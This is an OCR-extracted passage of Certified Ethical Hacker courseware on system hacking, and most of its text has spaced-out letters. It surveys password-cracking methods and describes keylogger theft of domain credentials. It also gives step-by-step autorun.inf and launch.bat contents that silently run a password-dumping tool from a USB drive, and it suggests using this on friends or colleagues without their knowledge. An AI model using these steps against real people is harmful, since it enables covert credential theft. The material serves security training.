it a g a in s t u se r a c c o u n ts t h a t t h e a p p li c a t i o n loc a te s . D i c t i o n a r y a tta c k s a re m o r e e f f e c t i v e w i t h lo n g w o r d s . Q T h e b r u t e f o r c e m e t h o d is t h e m o s t in c lu s iv e , a lt h o u g h s lo w . U s u a lly it tr i e s e v e r y p o s s ib le l e t t e r a n d n u m b e r c o m b i n a t i o n in its a u t o m a t e d e x p l o r a t i o n . 0 A h y b r id a p p r o a c h is o n e t h a t c o m b in e s f e a t u r e s o f b o t h m e t h o d s . It u s u a lly s ta r t s w i t h a d ic t io n a r y , a n d t h e n tr i e s c o m b i n a t i o n s such as t w o w o r d s t o g e t h e r o r a w o r d a nd n um be rs. Users t e n d t o h a ve w e a k p a s s w o r d s b e c a u s e t h e y d o n o t k n o w w h a t c o n s t i t u t e s a s t r o n g p a s s w o r d a n d , t h e r e f o r e , d o n o t k n o w h o w t o c r e a te s t r o n g p a s s w o r d s f o r t h e i r a c c o u n ts . As s h o w n , t h i s lea ves p a s s w o r d s o p e n t o a tta c k . Module 05 Page 560 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 45. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Stealing P assw ords Using USB D rive 1 Attacker c EH U rtifM User itkMjl IlMhM Passwords PassView is executed in th e background and passwords w ill be stored in th e .TXT files in th e USB drive Inse rt th e USB drive and th e autorun w in d o w w ill pop-up ( if enabled) C ontents o f launch, bat D ownload PassView, a start p s p v .exe/stext p s p v .txt password hacking to o l Create autorun.inf in USB drive Copy th e downloaded files to [autorun] e n = l a u n c h .b a t USB drive Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. £ W < S tealing P a ssw o rd s U sing USB D rives ‫>־‬ z J S te a lin g p a s s w o r d s u sin g a USB d r i v e is a p h y s ic a l a p p r o a c h f o r h a c k in g p a s s w o r d s sto re d in a c o m p u te r. A tta cke rs can ste a l passw ord s u s in g a USB d r iv e and d iffe re n t a p p lic a tio n s . P e o p le w h o h a ve m u l t i p l e o n l i n e a c c o u n ts u s u a lly s to r e t h e i r u s e r n a m e s and p a s s w o r d s as a b a c k u p t o use if t h e y f o r g e t t h e m . You can r e c o v e r o r s te a l such c r e d e n t i a l s u sin g a USB d riv e . T h e p h y s ic a l a p p r o a c h m a t t e r s a l o t f o r h a c k in g p a s s w o r d s . O n e can ste a l p a s s w o r d s u sin g a USB d r iv e a n d a p p lic a tio n s . This m e t h o d is a p p lic a b le f o r h a c k in g s t o r e d p a s s w o r d s in a n y c o m p u t e r . M o s t o f t h e p e o p le s ig n in g u p f o r a la rg e n u m b e r o f w e b s i t e s u s u a lly s to r e t h e i r passw ords on th e c o m p u te r in o r d e r t o re m e m b e r th e m . O n e can t r y re c o v e rin g th e m a u t o m a t i c a l l y u sin g a USB d riv e . T his r e q u ir e s p lu g g in g t h e USB in a n y p o r t o f t h e c o m p u t e r in w h i c h t h e p a s s w o r d s h a v e b e e n s t o r e d . T his t r i c k is a p p lic a b le f o r W i n d o w s XP, W i n d o w s 7, W i n d o w s V is ta , a n d W i n d o w s 2 0 0 0 . All t h e a p p li c a t i o n s i n c lu d e d a re p o r t a b l e a n d l ig h t e n o u g h t h a t t h e y can be d o w n l o a d e d in th e USB d is k in f e w se c o n d s . You can also h a c k s t o r e d M e s s e n g e r p a s s w o r d s . U sing t o o l s a n d a USB p e n d r i v e y o u can c r e a te a r o o t k i t t o h a c k p a s s w o r d s f r o m t h e t a r g e t c o m p u t e r . S te a lin g p a s s w o r d s u s in g a USB d e v ic e is c a r r ie d o u t w i t h t h e h e lp o f t h e f o l l o w i n g s te p s : 1. You n e e d a p a s s w o r d h a c k in g t o o l Module 05 Page 561 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 46. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker 2. C o p y t h e d o w n l o a d e d .exe file s o f p a s s w o r d h a c k in g t o o l s t o USB d riv e . 3. C re a te a n o t e p a d d o c u m e n t a n d p u t t h e f o l l o w i n g c o n t e n t o r c o d e in t h e n o t e p a d [a u to ru n ] e n = la u n c h .b a t A f t e r w r i t i n g th is c o n t e n t i n t o N o t e p a d , save t h e d o c u m e n t as a u t o r u n . i n f a n d c o p y th is f ile t o t h e USB d riv e . 4. O pen N o te p a d and w rite th e fo llo w in g c o n te n t in to N otep ad : s t a r t p s p v . e x e / s t e x t p s p v .t x t A f t e r t h a t , save file as la u n c h . b a t a n d c o p y t h is f ile t o t h e USB d r iv e 5. 6. In s e r t t h e USB d r i v e a n d t h e a u t o r u n w i n d o w p o p - u p ( if e n a b le d ) . A p a s s w o r d - h a c k i n g t o o l is e x e c u t e d in t h e b a c k g r o u n d a nd p a s s w o r d s can be s t o r e d in t h e .TXT file s in t h e USB d riv e . In t h i s w a y , y o u can c r e a te y o u r o w n USB p a s s w o r d r e c o v e r y t o o l k i t a n d use it t o ste a l sto re d p a s s w o r d s o f y o u r f r i e n d s o r c o lle a g u e s w i t h o u t t h e k n o w l e d g e o f t h e th e p e r s o n . This p ro c e s s ta k e s o n l y a f e w s e c o n d s t o r e t r i e v e p a s s w o r d s . Attacker FIGURE 5.11: Stealing Passwords Using USB Drives Module 05 Page 562 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 47. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Stealing P assw ords Using K eyloggers CEH J Keyloggers provide an easiest and most effective means of stealing a all victinVs user names and passwords J If an attacker is successful in infecting a victim's machine with a Trojan that have keylogging features he can instruct the Trojan server to log and send back all user credentials to his machine Attacker infects victim’s local PC with a software keylogger Victim logs on to the domain server with his credentials © ................... > .........& Attacker Keylogger sends login credentials to hacker . Victim Domain Server Attacker gains access to domain server Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. S tealing P a ssw o rd s U sing K ey lo g g ers W h e n e v e r an a t t a c k e r n e e d s t o c ra c k s o m e t h i n g , he o r she u s u a lly t h i n k s a b o u t th e p o s s ib le l o o p h o l e s in t h e w h o l e p ro ce ss . P a s s w o rd s a re t h e p ie ce o f d a ta used t o access an a c c o u n t o r a s y s te m . C h o o s in g c o m p le x p a s s w o r d s m a k e s y o u r a c c o u n ts s e c u r e a n d t h e j o b o f t h e a t t a c k e r d if f i c u l t . A c o m p le x p a s s w o r d m a k e s t h e a tt a c k e r 's j o b d i f f i c u l t b u t n o t im p o s s ib le . P a s s w o rd s a re t h e p ie c e o f d a ta t o be s u b m i t t e d t o a s y s te m o r a p p li c a t i o n t o g ain access t o it. P a s s w o rd s a re u s u a lly e n t e r e d t h r o u g h t h e k e y b o a r d . H e n c e , if an a t t a c k e r has s o f t w a r e o r a m e c h a n is m t h a t can log t h e k e y s tr o k e s a n d se nd t h e r e p o r t t o h im o r h er, t h e n t h e a t t a c k e r can d e t e r m i n e t h e p a s s w o r d s easily. T h e p r o g r a m s t h a t a l l o w t h e m t o d o th is a re k e y lo g g e rs , a k in d o f m a l w a r e . K e y lo g g e rs can e x p o s e all t h e k e y s tr o k e s e n t e r e d by t h e t a r g e t in c lu d in g u s e r n a m e s a n d p a s s w o r d s f o r a n y w e b s ite s . A r e m o t e k e y lo g g e r can g iv e an a t t a c k e r access n o t o n l y t o y o u r e m a il a n d o n l i n e a c c o u n ts , b u t it can c o m p r o m i s e y o u r f i n a n c ia l d e ta ils as w e ll. K e y lo g g e rs a re u sed by p e o p le t o f i n d a c e r ta in p ie c e o f i n f o r m a t i o n such as a u s e r n a m e o r p a s s w o r d . T h e p ic t o r ia l r e p r e s e n t a t i o n c le a rly e x p la in s t h e w a y a t ta c k e r s ste a l p a s s w o r d s using k e y lo g g e rs . Module 05 Page 563 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 48. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Domain Server Attacker gains access to domain server FIGURE 5.12: Stealing Passwords Using Keyloggers W hen s te a lin g p a s s w o r d s , t h e k e y lo g g e r . W h e n t h e v i c t i m a t t a c k e r f i r s t i n f e c ts t h e v i c t i m ' s local PC w i t h a s o ftw a re logs o n t o t h e d o m a i n s e r v e r w i t h his o r h e r c r e d e n tia ls , t h e k e y lo g g e r a u t o m a t i c a l l y s e n d s lo g in c r e d e n t i a l s (u s e r n a m e , p a s s w o r d s ) t o t h e a t t a c k e r w i t h o u t t h e k n o w l e d g e o f t h e v i c t i m . O n c e t h e a t t a c k e r g e ts t h e v i c t i m ' s lo g in c r e d e n tia ls , he o r she logs o n t o t h e d o m a i n s e r v e r a n d m a y p e r f o r m a n y a c tio n . Module 05 Page 564 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.